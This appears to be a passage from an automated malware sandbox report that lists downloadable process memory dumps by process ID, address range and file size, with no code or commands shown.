memory/1512-302-0x00000000027C0000-0x0000000002865000-memory.dmp

Filesize
660KB

Download
memory/1512-295-0x0000000001FF0000-0x000000000212B000-memory.dmp

Filesize
1.2MB

Download
memory/1580-179-0x0000000000400000-0x00000000004D7000-memory.dmp

Filesize
860KB

Download
memory/1580-291-0x0000000000400000-0x00000000004D7000-memory.dmp

Filesize
860KB

Download
memory/2044-177-0x0000000000440000-0x0000000000446000-memory.dmp

Filesize
24KB

Download
memory/2044-153-0x0000000001080000-0x0000000001098000-memory.dmp

Filesize
96KB

Download
memory/2060-225-0x0000000000400000-0x00000000004D5000-memory.dmp

Filesize
852KB

Download
memory/2060-197-0x0000000000400000-0x00000000004D5000-memory.dmp

Filesize
852KB

Download
memory/2132-161-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/2132-69-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/2132-162-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/2132-163-0x000000006EB40000-0x000000006EB63000-memory.dmp

Filesize
140KB

Download
memory/2132-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/2132-164-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/2132-70-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/2132-71-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/2132-156-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/2132-72-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/2132-68-0x0000000064941000-0x000000006494F000-memory.dmp

Filesize
56KB

Download
memory/2132-159-0x0000000000400000-0x000000000051C000-memory.dmp

Filesize
1.1MB

Download
memory/2132-67-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/2132-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/2132-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/2132-77-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/2132-60-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/2132-55-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/2132-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/2132-78-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/2284-152-0x0000000000C20000-0x0000000000C28000-memory.dmp

Filesize
32KB

Download
memory/2312-193-0x0000000002160000-0x0000000002184000-memory.dmp

Filesize
144KB

Download
memory/2312-292-0x0000000000400000-0x0000000000453000-memory.dmp

Filesize
332KB

Download
memory/2312-192-0x0000000001FD0000-0x0000000001FF6000-memory.dmp

Filesize
152KB

Download
memory/2328-274-0x00000000027B0000-0x0000000002855000-memory.dmp

Filesize
660KB

Download
memory/2328-294-0x0000000001FF0000-0x000000000212B000-memory.dmp

Filesize
1.2MB

Download
memory/2328-279-0x00000000009D0000-0x0000000000A62000-memory.dmp

Filesize
584KB

Download
memory/2328-198-0x0000000001FF0000-0x000000000212B000-memory.dmp

Filesize
1.2MB

Download
memory/2328-278-0x00000000009D0000-0x0000000000A62000-memory.dmp

Filesize
584KB

Download
memory/2328-275-0x00000000009D0000-0x0000000000A62000-memory.dmp

Filesize
584KB

Download
memory/2412-218-0x0000000002310000-0x0000000002B7E000-memory.dmp

Filesize
8.4MB

Download
memory/2412-131-0x0000000002310000-0x0000000002B7E000-memory.dmp

Filesize
8.4MB

Download
memory/2428-219-0x00000000010A0000-0x000000000190E000-memory.dmp

Filesize
8.4MB

Download
memory/2428-137-0x0000000001910000-0x000000000217E000-memory.dmp

Filesize
8.4MB

Download
memory/2428-155-0x00000000010A0000-0x000000000190E000-memory.dmp

Filesize
8.4MB

Download
memory/2428-135-0x00000000010A0000-0x000000000190E000-memory.dmp

Filesize
8.4MB

Download
memory/2428-142-0x0000000001910000-0x000000000217E000-memory.dmp

Filesize
8.4MB

Download
memory/2428-220-0x0000000001910000-0x000000000217E000-memory.dmp

Filesize
8.4MB

Download
memory/2428-221-0x0000000001910000-0x000000000217E000-memory.dmp

Filesize
8.4MB

Download
memory/2488-181-0x0000000000400000-0x000000000046F000-memory.dmp

Filesize
444KB

Download
memory/2488-293-0x0000000000400000-0x000000000046F000-memory.dmp

Filesize
444KB

Download
memory/2828-180-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/2828-129-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/2828-226-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download